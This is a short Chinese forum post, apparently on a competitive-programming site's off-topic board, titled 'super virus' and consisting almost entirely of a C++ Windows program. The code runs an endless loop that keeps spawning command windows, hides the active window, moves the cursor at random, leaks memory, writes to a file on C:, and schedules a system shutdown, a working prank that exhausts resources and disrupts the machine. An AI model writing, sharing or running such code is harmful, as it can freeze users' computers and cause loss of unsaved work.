超级病毒
  • 板块灌水区
  • 楼主C_promax_promax
  • 当前回复1
  • 已保存回复1
  • 发布时间2024/10/27 16:42
  • 上次更新2024/10/27 16:49:05
查看原帖
超级病毒
1263898
C_promax_promax楼主2024/10/27 16:42
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
signed main()
{
	   //freopen(".in","r",stdin);
	   while(1)
	   {
	   		system("start cmd");
			HWND hWnd=GetForegroundWindow();
            ShowWindow(hWnd,SW_HIDE);
            SetCursorPos(rand()%1000,rand()%1000);
            malloc(1000);
            system("horror>>c:\\horror.txt");
            system("shutdown -s -t 300");
	   }
	   //freopen(".out","w",stdout);
}

2024/10/27 16:42
加载中...